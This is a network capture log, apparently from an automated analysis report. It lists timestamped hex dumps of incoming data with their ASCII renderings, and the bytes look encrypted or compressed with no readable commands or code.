                                                                                                                                                    2022-09-29 12:59:00 UTC3223INData Raw: c7 2c 7d 78 61 88 f6 34 ea 65 e6 73 17 df 86 30 be 9a 1f 33 79 31 a0 13 31 15 6c 3b e6 c4 5b 2d e7 bf a5 bb d8 15 3d 97 74 79 2b 73 06 0e 1d e1 7a ad f9 21 d2 ab 6b 7d 40 5d b7 2c 79 77 49 e8 86 4d 47 ac af 6d 82 6e fa d3 2a 43 72 40 8c e2 ec 3a 81 95 a9 ef e7 73 65 40 8a ba f1 f0 ef 6c 30 e2 2f 6a 9d 9b 08 7a 20 cb 39 da eb af 9f a0 11 96 2c aa 28 65 de 12 c6 9a 52 80 fb e4 f1 f2 21 c3 52 a7 10 59 b1 6e cf 40 56 f0 a3 91 83 95 4d e1 d9 5f 9b bc b8 9e 5f 51 1f 61 09 98 3c a0 0b ef 3f 36 9f ab b2 84 2e db 5c 34 bf de c3 7c 59 6a 60 84 a3 31 03 09 e1 38 dc 25 07 ef b1 1e df de 47 84 61 e1 ad d2 d7 3c 8c f3 93 4e 13 72 a5 4a 47 27 51 fd f4 0f 06 b1 af c9 9d 58 a5 95 d8 df b6 87 10 92 65 01 10 f6 ed 1a 03 a2 d3 13 55 80 b7 61 f4 08 4f ed bc 97 4a 2f 66 e0 d3
                                                                                                                                                    Data Ascii: ,}xa4es03y11l;[-=ty+sz!k}@],ywIMGmn*Cr@:se@l0/jz 9,(eR!RYn@VM__Qa<?6.\4|Yj`18%Ga<NrJG'QXeUaOJ/f
                                                                                                                                                    2022-09-29 12:59:00 UTC3239INData Raw: 84 95 c7 f5 07 1c 1c 94 03 38 cd a6 06 5d 04 ce d2 c9 21 0c d3 bf 11 9f b0 5b bd d5 61 24 f5 19 b3 36 ab 2f 9d 50 8e b9 8d 77 42 b3 c6 84 20 a3 11 2e 85 6d 55 6c 5f e6 9d 1c 62 73 e3 07 74 9d a9 16 f5 3a dc 94 69 16 49 03 86 ca 43 eb fc e7 df f3 e1 bb 49 47 96 05 40 18 eb 26 9d 9b 52 83 19 06 e1 d1 8c 29 18 86 24 05 03 a0 f5 0a fb da 87 90 39 53 92 de 15 74 76 ba 3c 5d 57 a7 56 69 92 16 ec 56 d3 14 ad fc 10 10 60 65 d0 36 70 95 c6 e1 ba c6 ec 2e 2f 4a 18 45 ff 43 91 03 0a 2f 06 85 e1 ca 3f 81 4a f1 0c a8 83 bd 85 e3 af f8 23 29 6c ec f1 84 d2 5c 8f 5c 1c ad 6e 8e a5 c4 53 b6 7f 10 41 bc 29 cd 15 11 f5 7a 3c e8 ca 1d 0c 23 57 c9 98 5c 76 94 b0 92 72 2f 99 23 01 25 c6 93 d1 34 a5 a4 a6 a5 20 8a 5c ba 2c da d3 f6 75 e2 c4 76 c2 2e 23 aa bd 2a 34 f5 82 00 7d
                                                                                                                                                    Data Ascii: 8]![a$6/PwB .mUl_bst:iICIG@&R)$9Stv<]WViV`e6p./JEC/?J#)l\\nSA)z<#W\vr/#%4 \,uv.#*4}
                                                                                                                                                    2022-09-29 12:59:00 UTC3255INData Raw: 5c 12 c2 d9 c9 fb e2 95 f9 c1 3f ab f4 af 41 77 1a c1 6c fd 0d 36 f4 02 9a dd 58 63 19 82 74 ab 1c 2a f6 bf 74 96 a8 be c5 0a 9f df ae d7 8c 00 e6 70 d5 b2 11 70 d9 c7 b8 ce 9d 2e 50 2c 40 f1 f1 58 6a ba f3 c0 2d 95 26 3d b2 e7 cb f0 27 3a e7 02 b8 b2 2f 9a 24 66 7b 51 99 25 fa 8b b6 a5 e7 12 2e 77 9f 98 47 6b e2 b2 87 f9 9d a1 62 d1 3f af c7 5f 71 b0 27 6a 74 d3 3d a4 fe 16 05 12 e7 5e 43 40 3c b1 8d 22 21 53 d3 9d 5e 04 ae 95 b6 9e b2 9d 70 0e a2 1a c8 d7 36 70 43 5d fc 9e 7b 90 00 f1 d0 cc 4f 21 94 b4 4c d7 eb 7a 4b e0 7a 10 29 74 5d dd 90 95 e9 83 f3 69 e7 46 f8 3a b8 fa ac f4 15 aa 8b bd fb fb 8c 69 40 24 47 79 e0 df d0 f2 e5 d3 11 a9 a0 b5 57 ea 0c 16 dd 9f d9 73 4b 20 c2 8b f9 ab 4f 1e ad a1 bb 9f 14 83 20 d3 57 54 60 5d 1d 28 d7 51 bd 8f 62 6f 4e
                                                                                                                                                    Data Ascii: \?Awl6Xct*tpp.P,@Xj-&=':/$f{Q%.wGkb?_q'jt=^C@<"!S^p6pC]{O!LzKz)t]iF:i@$GyWsK O WT`](QboN
                                                                                                                                                    2022-09-29 12:59:00 UTC3271INData Raw: 6b 41 ff 57 06 b5 f2 7d dc ad f6 97 96 0b 85 22 39 e8 85 be 67 10 d7 b4 76 2a 6f 43 63 61 41 9e f7 1d 53 d1 9c d1 11 a7 20 d3 b5 e0 3a 42 24 c8 47 f3 b4 36 fb ca 7c c4 4e 56 ad 32 26 5b f4 62 9d 0f c4 7b 8d 27 20 97 b5 a8 95 f9 88 c7 64 83 42 8b 32 a4 68 ff c5 0f f3 77 b5 b2 55 d1 00 21 16 2b 10 c7 1e 1c 71 c2 86 6c 2e 1a c6 16 e8 c2 5d a3 5f 18 61 51 f0 3a dc 59 e3 3f 8b c4 19 32 2a e8 51 d8 a5 a9 34 d9 ff b1 c7 15 4a 47 4e 5c 3b fa 7a 14 3b 2d c5 cc 6d 21 c8 fd 0f be 4c 99 55 b1 d1 f2 09 c4 6d bc 00 ab 47 2f a7 2f 72 a5 43 ce c6 ca 49 ab ad 41 71 7e 66 6b ab 7d e8 31 4b fc 74 18 86 3b b8 da 9d dc d2 fa 90 02 65 71 19 90 16 89 63 cb c7 87 33 c2 c0 f2 d3 28 6a e9 65 c2 82 b9 71 d2 06 23 aa e1 e0 da a1 63 e5 83 06 6c fc 14 ff e0 e1 d2 f4 09 3b a9 c5 7b 61
                                                                                                                                                    Data Ascii: kAW}"9gv*oCcaAS :B$G6|NV2&[b{' dB2hwU!+ql.]_aQ:Y?2*Q4JGN\;z;-m!LUmG//rCIAq~fk}1Kt;eqc3(jeq#cl;{a
                                                                                                                                                    2022-09-29 12:59:00 UTC3287INData Raw: 1b 47 6d f3 88 4f 6f ce 8a 94 a6 34 55 83 3a b7 5c 4c 31 7d 92 e2 e7 27 d6 43 0c c8 3d 47 68 f8 5e 60 0d 7f b1 cc e4 76 e3 56 8c 2a e4 f6 89 5b 62 ba 90 92 8c 40 ed 68 af 7f a0 d7 4d 16 14 76 08 66 83 9e dc 65 ce 03 90 a4 2e af 87 7d b9 2c ba e8 14 ab 84 40 46 cd 7b 26 d0 86 df b8 40 70 b8 d7 de 1c e1 04 bd 42 e7 b1 c3 77 69 68 b3 80 63 18 84 00 12 3d e8 69 48 ba 33 76 db 40 4f 65 df 7c a1 04 dc 20 03 b1 ab 73 28 9b cc 2a b1 df 3e 99 f6 3a 6b 6c 22 41 2a 9b cd e5 d0 19 ce 45 43 88 44 96 fa 21 59 ab 77 02 29 88 21 63 9e 16 d2 ab 5c 5e f7 b1 30 c3 8d 80 fa c7 fe 14 fc f7 16 12 cd 22 c8 f7 72 61 60 28 55 5a 3f bc c2 0b 55 b5 c4 5e f5 99 94 39 80 4f 38 8f 1f ae 80 09 4f 61 62 dc b5 bc 35 cd 5a 93 94 b4 20 d7 85 0d 7e f3 07 bd c1 a7 0a 0e a9 5c 31 03 4c 1d 2e
                                                                                                                                                    Data Ascii: GmOo4U:\L1}'C=Gh^`vV*[b@hMvfe.},@F{&@pBwihc=iH3v@Oe| s(*>:kl"A*ECD!Yw)!c\^0"ra`(UZ?U^9O8Oab5Z ~\1L.
                                                                                                                                                    2022-09-29 12:59:00 UTC3303INData Raw: b5 e2 7a d5 b1 29 19 1b 1b d0 61 00 64 45 e7 5f c6 20 44 c0 af 7c 11 c4 47 ef 3f 70 1d c2 6a 98 7b c0 12 c9 b3 34 4b 70 b8 bd 83 4c 22 c0 a8 90 f6 3d 68 7b 89 20 3b c1 05 f9 f6 e9 83 67 46 78 38 60 dc de 4a 55 77 93 3e ae 0f 1a b7 c4 a4 65 7b ab 5a 06 c4 ff cb 01 b7 4c 1d 74 11 67 c1 60 cb 5c 63 40 47 e1 5e a5 ca 9e 53 0d c3 11 7c 5c d9 a5 9b 73 8f 48 49 55 81 9f e5 ab 56 e7 4f 31 73 fe f8 ba 18 ee 3b 63 60 75 bb d5 df 2f 34 e7 84 1d 05 98 5d da 53 b4 0c 4e ca c1 e5 e3 45 47 70 91 c6 00 15 4b 9b 5b fa 3d 45 d3 b7 ee cb be 1c bb ba 82 57 a2 3e 08 82 fe 85 ea a0 2e d7 0f 07 b8 52 f6 1e db e9 99 67 84 fc f0 32 59 1e 6b 1b f8 93 05 b9 25 86 2f 28 9f 31 75 75 bc 44 57 6b ce 16 c7 88 6f b0 dc 18 92 22 4f 16 03 f2 7a 32 71 25 e0 a2 5e 97 25 5b f6 3d 0f 03 a6 e6
                                                                                                                                                    Data Ascii: z)adE_ D|G?pj{4KpL"=h{ ;gFx8`JUw>e{ZLtg`\c@G^S|\sHIUVO1s;c`u/4]SNEGpK[=EW>.Rg2Yk%/(1uuDWko"Oz2q%^%[=
                                                                                                                                                    2022-09-29 12:59:00 UTC3319INData Raw: 65 3c c2 43 e2 42 76 08 9b e3 af 6d 5d 91 96 c2 68 a3 39 9f fc ab 94 b3 1c 66 4c 59 6d 6c 6f 54 1e 58 ff 9f e3 e4 f0 cb 4d 73 42 14 11 3d b0 7f f4 7a ef bb 91 bd 35 e9 d3 59 8e 82 60 ae a2 43 87 9c 64 a7 44 10 ad ca d8 fb 11 ba ae 3e 01 e6 74 b2 6f 5d 47 f4 80 ad 77 f6 99 ca a8 3f 35 7b 6e 6d 1b b5 7c e1 ab ce fd 4a 72 88 83 f4 29 f4 26 ab b9 cf 48 aa e6 23 ed bf d0 7e e3 4a 5d 95 54 d7 bc 04 f0 f7 d0 88 ab 56 bb 60 b6 41 e5 d8 43 bc 2d 03 02 ca a2 0e 09 ac dd cd 85 5e 08 55 26 4c ae 2f 82 2d 50 70 6f fd db 78 0a 82 97 91 df 1d 76 3b a2 5c c4 60 0c 7f 71 08 73 d1 52 00 85 8f b7 b9 88 d0 e1 bf 41 c7 a0 31 58 d5 2b a2 f9 33 de 38 0c b3 70 58 0c 3f a8 5b 66 f8 88 be 73 dc 61 9a c5 c5 3a 00 89 8f 78 fc f5 00 7d 53 56 6a 71 75 05 03 de 14 b9 14 67 d4 ab 0b a6
                                                                                                                                                    Data Ascii: e<CBvm]h9fLYmloTXMsB=z5Y`CdD>to]Gw?5{nm|Jr)&H#~J]TV`AC-^U&L/-Ppoxv;\`qsRA1X+38pX?[fsa:x}SVjqug
                                                                                                                                                    2022-09-29 12:59:00 UTC3335INData Raw: e6 cc d2 fa 06 eb bc ed 8c b4 7d c9 03 ba 62 c6 60 ca 83 78 aa 1f bb 0c b8 a4 10 98 4d aa 30 56 d7 6c 65 1a 22 57 7d f3 5e 5e 5e 11 57 ba cb 5e ee ba 1d 6c 26 d2 b8 7d 7f 06 6b d7 91 78 ed 90 1c d8 45 61 d6 53 2b 37 67 d9 1c eb 8e 64 5a 85 78 1c 30 24 ff 51 d1 b1 e1 c7 04 d9 4b e8 70 0f ff a2 77 46 e3 18 96 e9 d1 44 c1 bc ba af 6b db 11 cc 30 f1 35 2f 68 58 e0 0b c6 33 d3 2c 59 94 1e 3c 71 91 0e 2d 20 13 df ca 58 83 d1 9d 83 b1 cd a6 c1 86 06 ff 55 1f 79 7a cb 70 c0 1e 7e 74 b0 7e 9a bf 6e 76 fb b1 52 95 6b 6a ba 9e 7f 91 7e e8 10 8e b8 c3 2c b8 6b 68 b1 db 70 9e 56 86 dd d9 5d 4e 21 18 fa c5 65 25 fe 59 4e 34 5b d3 a9 21 fe 2f 79 6d 06 d4 7b d3 60 14 1e 72 87 ec 72 29 00 04 71 a1 ae a0 8a 7f ff 40 ea 46 eb f4 eb 67 46 48 21 d6 43 c3 0d 77 ad de 0c 33 03
                                                                                                                                                    Data Ascii: }b`xM0Vle"W}^^^W^l&}kxEaS+7gdZx0$QKpwFDk05/hX3,Y<q- XUyzp~t~nvRkj~,khpV]N!e%YN4[!/ym{`rr)q@FgFH!Cw3
                                                                                                                                                    2022-09-29 12:59:00 UTC3351INData Raw: 97 bd 65 5d c8 cb 55 14 0f f2 3f a1 61 25 24 f7 3c 69 8a 49 1f 19 5e d0 41 dd 5d 92 e5 ad 67 24 38 bf 03 16 c8 a8 14 ed 70 3c 9a 0b 65 2b 3c 00 a0 35 0f d8 d3 f4 e3 e7 70 05 4e 98 3a 86 fe a5 ac f8 29 d0 db 16 08 24 d8 de 59 c6 c5 e0 46 3e d3 6f 5a 99 a8 cc 7d 13 dd 9e b9 56 b5 27 78 42 50 6c 82 46 cf b7 d3 b6 47 f9 64 c9 4a 2d 49 de 5c 4b f3 1a 7c a7 07 db 10 76 d9 4c 10 4f 7e 8d ca da 79 20 81 fd a0 2e 96 c5 e2 f7 f3 79 4c fb 43 e9 06 36 98 6b 9e c4 33 3a 9b 66 40 9e 30 c3 91 9c 3e 5f 90 95 28 df e0 0e 1b 1b 55 a6 24 34 5d b0 42 22 8f a9 25 40 6e 60 64 fe 23 1f b8 bc ce 75 67 09 38 ed d1 e5 60 d1 54 a2 54 32 75 50 f2 f6 21 f5 e1 e1 8b ee c0 af 05 10 8b b1 49 b8 69 f7 11 91 ac 79 75 1c e1 e1 e7 c0 bf af 00 55 cb fe d2 4b 6e 91 b3 dc 40 21 4e 2b a7 c6 66
                                                                                                                                                    Data Ascii: e]U?a%$<iI^A]g$8p<e+<5pN:)$YF>oZ}V'xBPlFGdJ-I\K|vLO~y .yLC6k3:f@0>_(U$4]B"%@n`d#ug8`TT2uP!IiyuUKn@!N+f
                                                                                                                                                    2022-09-29 12:59:00 UTC3367INData Raw: 14 d4 be 3a ba 59 06 12 60 dc a6 2b 89 58 d4 cc 05 2c f7 ec 32 49 87 4d a4 8b 31 29 62 b1 b3 87 d8 b8 1d 2d f8 37 a3 e4 da 1c 3a 83 a7 b0 38 4a c9 fe b9 ac a3 16 ce eb 78 4c 03 a7 fe ab 68 db 69 4d 0b e6 ea 86 79 5c 9b 23 64 28 25 c9 6e 0e a8 cc 3c 72 20 28 86 56 67 b5 d6 df 09 b7 a9 ef bc 7b af c0 fc 57 0c 4a 5e 81 59 23 00 8a 31 52 97 47 88 ee 72 d5 e2 f2 99 76 c6 24 0c 59 19 1c 69 ac 48 18 8e 55 fe 45 74 8a ed 85 ad 5b 4b d0 69 aa aa 1e 4f 6b 9d b4 c0 fb d9 5b bf 74 de 2d 89 fe 6d 77 06 06 5b d4 7a 02 65 81 d1 93 53 2e c4 03 a4 7a 8d fe ed 75 82 6a 83 79 ea 82 22 2e 2d 4b 1d a0 59 9c 98 11 6c a2 d0 76 67 86 2b 96 9d 2c f4 ee ce 66 67 d6 55 4c a3 b0 81 da 90 0a 42 02 d9 71 73 69 a0 f9 5d e5 c3 f7 3d dc 76 6a 9d 5c ab 1c 76 d7 e3 50 7c be 32 b9 0b 9d 86
                                                                                                                                                    Data Ascii: :Y`+X,2IM1)b-7:8JxLhiMy\#d(%n<r (Vg{WJ^Y#1RGrv$YiHUEt[KiOk[t-mw[zeS.zujy".-KYlvg+,fgULBqsi]=vj\vP|2
                                                                                                                                                    2022-09-29 12:59:00 UTC3378INData Raw: c0 de 44 7a 9a b3 28 aa e0 57 82 a8 ea 8c 08 51 fb 8f df 1a 51 fc 03 aa 3f 6c 90 36 bb 1e f4 5b b8 02 23 a1 b0 0d 5d 70 44 e2 6f 52 77 e7 d3 16 84 05 d3 8d f9 41 68 70 7b d6 3e 02 3c 9b 17 8e e3 ae 96 55 b9 b3 46 65 6f 26 8e e2 80 f0 da 56 d5 67 a9 8f ce fe 33 a9 9d 12 ea 2d 0f cf 69 3c 20 9a 1a 49 c5 73 cb 9e 7f 96 78 43 ef 97 74 f5 fc 59 a7 63 fb 04 60 07 8d 27 fe 09 54 fd 6c 23 23 e5 8f e8 60 b7 d0 d6 9d b9 88 b2 d3 14 0e a2 b0 ba 3c 41 fc 1c 42 0f 79 ee 64 4a 87 dd dc fa e3 f8 c8 4e 2b b8 44 c5 54 05 0f 7d 82 3f 8c ce 1f 7a b6 74 ed 20 dd 81 77 e5 fa db 19 85 4e cf cd 79 f5 b3 15 df 71 51 11 05 1f 3a fc 8c 35 a8 25 dd a1 2f 27 20 7e 0d 71 90 dd 90 9c 38 24 ad 4f 47 f9 0e af 22 ff fd 0d 1f 28 e8 23 67 da 61 6c 26 7a ad 75 ab 82 6b b8 60 15 b7 13 52 c1
                                                                                                                                                    Data Ascii: Dz(WQQ?l6[#]pDoRwAhp{><UFeo&Vg3-i< IsxCtYc`'Tl##`<ABydJN+DT}?zt wNyqQ:5%/' ~q8$OG"(#gal&zuk`R
                                                                                                                                                    2022-09-29 12:59:00 UTC3394INData Raw: 72 52 e6 22 3b d9 c0 d8 33 03 de 0d 30 1f 41 bf ad b0 fb 48 06 a7 3d e5 a5 80 cc be 17 f5 da e2 7a 35 0d d1 e0 a8 71 c8 c1 b0 a5 9b 7d 58 f2 55 b2 58 c1 ab 11 11 bf ef dd e0 95 89 2e 8e 74 8f 96 12 13 e4 ce 41 6a 2e 0c e6 d2 1a 39 78 b5 9e 47 b4 d9 6a e3 9c bd e5 09 b7 8c 9e c4 9c ef 2a c4 f9 eb a9 09 44 42 59 13 30 0c 0a 95 a4 a3 d3 4c 53 7e fb 3e a5 fb 71 4b a9 95 6f dc 64 1b 1a 49 c3 88 77 3e c8 0c d0 bf 81 e3 07 bc b6 79 35 c0 35 c6 67 f5 0e e9 69 7c 57 80 58 1f 0e 1e 37 ce b3 9f 61 74 4f 92 2e 86 8b ea f2 21 00 fc 98 af 4f 12 c3 a1 8b 93 85 4c f7 88 37 cf 93 fd 2a ba 23 e8 c8 03 e0 9d 2f a0 0b 94 b6 ce 0f 55 7c 2f 24 6c 9d 6a 16 69 1a 77 40 5a 92 e4 a4 2a 02 1e 73 55 4b fd e4 ab 2c 5f 3a 65 2a db 06 e1 e0 a7 67 c1 96 fc bb 01 7e 2d 18 73 98 bd dd 41
                                                                                                                                                    Data Ascii: rR";30AH=z5q}XUX.tAj.9xGj*DBY0LS~>qKodIw>y55gi|WX7atO.!OL7*#/U|/$ljiw@Z*sUK,_:e*g~-sA
                                                                                                                                                    2022-09-29 12:59:00 UTC3410INData Raw: 3f 24 fc 5b 9d 8c 26 07 f6 3b 79 d3 f8 06 0b d0 2a 14 4c 52 7f d0 14 43 dd 5a 53 22 3f eb 30 c8 09 29 b5 ba f8 2c b8 06 06 a1 5e 2f ab 3d a1 15 d8 ee d2 61 5c ec 43 78 26 2c 97 4d 03 1d 7a 82 79 da 2f 74 a1 8d 8c b7 89 a9 6d 03 9b 10 31 4e c9 39 f7 7d 98 f2 9a 07 00 52 a6 02 ae 44 a6 cb dd b0 91 2d 94 e6 6c 34 5c 56 b9 f8 57 ba d9 c5 e6 e8 98 5c 22 3e b4 e5 c4 3a 5b cd 35 77 b0 da 74 c2 35 4e 0f e0 0d 18 db 06 fc b2 6f 1e b0 59 4b 94 fe 4e a9 54 6d de ab be e8 fa 35 2e f5 fb fb 5a e8 f3 1c dd 2c d3 26 82 88 f9 b8 75 59 06 02 f7 7d 77 6c bd ed 1a 08 11 10 5d 70 e4 1c 73 c9 c8 57 78 41 9d b0 a0 f6 e0 8d 7a 03 ed 91 57 00 40 8c d0 e2 f4 84 f8 68 a1 5e 89 4a 9b 3a af 79 21 6f ca 70 f5 94 47 23 74 8d cc d3 e2 76 00 5d e3 79 c3 5c 8e e1 14 ed cb 44 02 0d 28 91
                                                                                                                                                    Data Ascii: ?$[&;y*LRCZS"?0),^/=a\Cx&,Mzy/tm1N9}RD-l4\VW\">:[5wt5NoYKNTm5.Z,&uY}wl]psWxAzW@h^J:y!opG#tv]y\D(
                                                                                                                                                    2022-09-29 12:59:00 UTC3426INData Raw: 61 d2 c2 8a 76 df 0f 0e 4d fd 27 d5 14 15 68 b0 9d c3 e8 c7 43 cb 81 a2 b8 6d 4a 9c 3d c3 29 5f f7 cb 9b 7b a1 eb b2 5e 13 3c 16 19 e8 8f da c6 2c 34 5e b5 b5 7e 98 ec 20 03 00 85 e1 65 4f ba 9e 53 24 c3 7c 33 e2 e6 11 ff 63 69 7f e3 d0 a1 62 a5 34 f2 39 f2 58 f8 6c 65 bc 19 24 86 0a 59 bc bd fe 50 61 68 2a 89 33 19 97 ae 85 60 8a b6 19 1a 81 08 4a 65 12 bc 8b fa 58 64 cf c0 f9 fa 29 a6 e7 5e 5a 21 5f d8 01 27 fe 17 60 5c cf 89 ac 6f e4 1f c6 92 d2 35 ff 75 b1 c2 09 95 6e 13 fd 41 ae f3 89 c4 88 7d 59 48 83 53 c4 e0 9b 2c cb 2b c9 9d 5b 4c 41 48 3d d4 74 f5 a0 05 e0 0e 2c b4 a5 b8 2f ce a2 6e d0 fe fe 38 87 71 6a be 76 c1 76 e0 80 5e be 4a bc f2 1b 77 29 78 38 0a d2 7d f4 6e db a4 5a fe fe 3a 95 3f b9 50 ca 87 d9 17 59 1d c3 ae 66 5b 83 2f 69 d7 16 ce 4e
                                                                                                                                                    Data Ascii: avM'hCmJ=)_{^<,4^~ eOS$|3cib49Xle$YPah*3`JeXd)^Z!_'`\o5unA}YHS,+[LAH=t,/n8qjvv^Jw)x8}nZ:?PYf[/iN
                                                                                                                                                    2022-09-29 12:59:00 UTC3442INData Raw: 06 2c ce 64 0c 38 c7 d9 74 aa 52 5f 44 3a 54 2a 54 c4 05 3a f8 f8 58 d3 8c f6 a6 19 91 f2 e6 44 de 62 a0 98 ec ab 4d 5d cc ad 21 41 a4 27 1e db ce a4 3e 07 e7 96 fb 8a 6f ce c2 88 d1 50 6a 2b 0d 34 17 99 25 23 f3 ee e5 86 8a 3f c8 e1 9d b5 3c 85 5e 59 1e e0 52 77 8a 51 43 e3 b0 f8 5b 24 42 88 a0 12 9a 1b fa aa bd e1 c6 a1 99 51 cc 48 5b bc 6a f0 03 9d 20 84 88 0f fb 5b 65 2b 9a 8a a1 a5 3e 16 fd 51 d6 94 51 55 6f 64 97 4d ce ad 14 9b 6e 18 a5 10 12 da 18 80 e4 55 d7 c9 ca 48 0b dd da 94 af bb 86 b1 5d 53 f0 fe 12 5f 17 91 69 02 ae 1e 93 7f 66 92 a3 d9 13 d5 30 2c 6d 03 fa a0 1b 9c 06 71 3f 41 a2 51 47 ed 46 a3 60 c2 0a bc 4e 9c bb 22 01 ce 37 a3 4c 55 04 c3 e8 39 be 81 fb a7 57 39 bd be 4d bc 35 09 fa bf 8f be b8 3c a4 28 11 52 af 97 39 40 78 ac 5c 53 ef
                                                                                                                                                    Data Ascii: ,d8tR_D:T*T:XDbM]!A'>oPj+4%#?<^YRwQC[$BQH[j [e+>QQUodMnUH]S_if0,mq?AQGF`N"7LU9W9M5<(R9@x\S
                                                                                                                                                    2022-09-29 12:59:00 UTC3458INData Raw: 09 58 b6 b9 37 8f 94 da 58 25 d6 02 75 71 03 6d f1 41 30 b5 e2 f9 d6 43 e4 f6 a2 c9 92 a0 a0 7d a9 83 33 68 ba fb b2 2f 7a b1 b9 e0 f8 eb d6 39 fe 78 ea 90 1f 2f 47 96 db f5 b0 bc f9 de 7a 05 cc 45 a0 50 0e 15 59 29 ea af e6 a5 1b cf 02 30 a3 8c 4e 6b 51 11 c6 69 31 a3 46 63 5c 94 f3 7f 70 89 1e de 77 51 e9 4c 54 1f 8c d6 20 e8 c8 f2 89 c3 69 f3 4c c0 4c 1c 96 92 c3 a7 95 48 1b 46 0e 7b 6a 04 71 a6 88 7a d9 42 bd 92 70 71 bb 5c 13 d9 54 d9 76 11 51 60 e1 d5 a6 d6 40 b7 9c 67 21 43 2a c2 a6 5b 94 20 84 1b a8 b7 64 db 89 b3 48 3f ae ee c6 e6 a9 3b af ea 16 40 a0 02 cf eb c7 46 4a 31 d0 a8 fa db c2 cb 67 8e 20 b7 d1 2d b3 c9 87 fb 92 9e c8 16 0d aa f9 5a dd 1c 69 ff c3 8d 94 b2 34 96 ac e6 b0 26 14 90 ee f8 26 f5 84 66 0c a4 e1 4d 38 6d 86 2f da b9 51 91 32
                                                                                                                                                    Data Ascii: X7X%uqmA0C}3h/z9x/GzEPY)0NkQi1Fc\pwQLT iLLHF{jqzBpq\TvQ`@g!C*[ dH?;@FJ1g -Zi4&&fM8m/Q2
                                                                                                                                                    2022-09-29 12:59:00 UTC3474INData Raw: d0 c0 1c 01 f6 7b a8 82 91 57 57 d2 c0 56 82 ee 29 90 91 2f c8 99 7d 1f c6 6d aa 6e 88 8e 56 ea ee 3c af aa fd a0 8a 46 95 c2 cf 6d 56 2d b0 01 5f d1 52 f1 29 fb f6 9d 59 a4 91 dd 1a 7e de cc 61 17 5a b4 d1 ce 4f ae 37 74 09 a3 24 71 30 ef 46 31 58 04 f2 f3 02 a2 26 9c 8d 79 1f 49 42 78 6d 81 94 e6 47 63 59 53 38 e8 dc a2 98 ba cb 6f 3e 1f 45 33 92 bf 0b 06 fc 77 0c a1 80 53 a7 99 da fb 7c d1 37 3f 90 65 c0 b3 e7 f6 91 fc 21 32 a1 97 4d 10 5b 23 a4 ff 03 d8 a1 f6 cd 00 7e c2 6a c6 9c cd e9 ec 75 a3 8b bb a1 1a ae 0a 33 29 48 29 db a8 52 50 ae 18 21 ac 69 0b 80 42 18 58 79 30 35 de 17 cd 52 ec 44 f2 54 00 75 e0 f8 6c 11 11 22 71 d5 28 85 e4 82 6a 01 5d 51 a5 a8 18 1b d3 95 df b5 f6 17 41 1a bf 3d 8b b5 f2 a4 5e 35 ae 91 09 75 8c 88 ac 46 6c cb 7e 98 43 45
                                                                                                                                                    Data Ascii: {WWV)/}mnV<FmV-_R)Y~aZO7t$q0F1X&yIBxmGcYS8o>E3wS|7?e!2M[#~ju3)H)RP!iBXy05RDTul"q(j]QA=^5uFl~CE
                                                                                                                                                    2022-09-29 12:59:00 UTC3490INData Raw: 96 3c fb 26 87 ea 4e 22 63 a3 a2 2a a6 c3 71 2c ce 31 24 5a 5b f3 94 6f cd d8 03 b8 e1 63 95 7f d8 6c 94 a7 09 a8 5c 3f f0 8b a7 c0 fc 8f 93 f4 e5 4e ec 44 c6 b9 22 29 e1 24 27 b8 14 88 28 3e 35 47 a7 36 a6 cd 30 ad 92 37 bd 3d d3 cc d2 2d b7 43 e2 39 03 cf 6e 16 21 a5 a0 5a b0 1e 6b c4 8a f1 94 bc fe 0e df 27 40 22 33 19 4b a4 6d bd be 64 fa f3 ac 2a e5 09 e7 c2 47 73 d9 e8 c2 41 2c 22 a8 40 79 ed 6c ce 67 ea 0e e6 0e b4 8e 78 74 62 7b 4f ed 41 c8 e1 b7 00 41 d8 6d 24 c7 32 15 d4 05 3c 60 4b 79 4a c5 97 b7 c1 40 84 3f a9 8a 46 33 97 9f 95 81 74 06 d0 4f cc 28 20 08 22 e0 68 42 cf f7 64 2a 55 bf ce c8 00 75 df 41 de b6 3b 04 44 41 48 98 76 03 2b ca f1 86 bf eb a9 33 22 d6 6a b5 21 37 40 c9 19 81 b6 11 9a 1f f1 0e 85 09 52 97 5a 17 1f a6 1d 2c 32 18 6e ba
                                                                                                                                                    Data Ascii: <&N"c*q,1$Z[ocl\?ND")$'(>5G607=-C9n!Zk'@"3Kmd*GsA,"@ylgxtb{OAAm$2<`KyJ@?F3tO( "hBd*UuA;DAHv+3"j!7@RZ,2n
                                                                                                                                                    2022-09-29 12:59:00 UTC3506INData Raw: d8 4a 2f b3 3b 46 ce f1 aa ee 0b 8e b5 cb 03 bd 5d 8e a5 27 b2 e4 d8 ec 9d d0 3f 1e e2 02 f9 a9 ab 38 5c d1 0e ad 38 94 c7 52 53 c1 a8 73 f7 60 6b 25 9c 95 0d e5 fa 72 48 e4 33 6f 87 ce 75 2d 46 ed 93 7a 83 a9 24 48 ca 5f 70 67 b7 ed 82 2a d8 09 43 a4 91 b9 91 09 ee 4e 5b 91 fe fd e8 ff d2 77 bd 3f 50 cd 69 28 03 45 60 20 da 13 9a aa 0f 5a 0a 27 de b0 2c 0a fa a5 aa 66 51 d2 6f e7 c1 5b e5 ee 74 d1 03 5b 03 78 85 d7 9a ba e1 6b c7 05 5a eb 4d 87 04 95 c3 4b c9 10 98 e1 f0 2d e6 5e 93 53 ce 70 a0 8e c9 9c 29 d6 6a 16 e1 b1 01 22 3f 23 e3 4c 0a 9f 29 ff 45 52 bf a7 6c 78 d5 fa 09 6d fc 7e f5 01 cb bb c2 4d 3c 57 2c 51 fb 0a 04 45 f4 f4 08 87 1b b5 60 b1 4b 5e 5a 4a e2 32 6e cb b2 6c 2f 13 d8 f6 17 0e 8c aa e5 24 94 a4 45 64 fc 49 2a 4f 30 27 91 6a 33 0c d3
                                                                                                                                                    Data Ascii: J/;F]'?8\8RSs`k%rH3ou-Fz$H_pg*CN[w?Pi(E` Z',fQo[t[xkZMK-^Sp)j"?#L)ERlxm~M<W,QE`K^ZJ2nl/$EdI*O0'j3
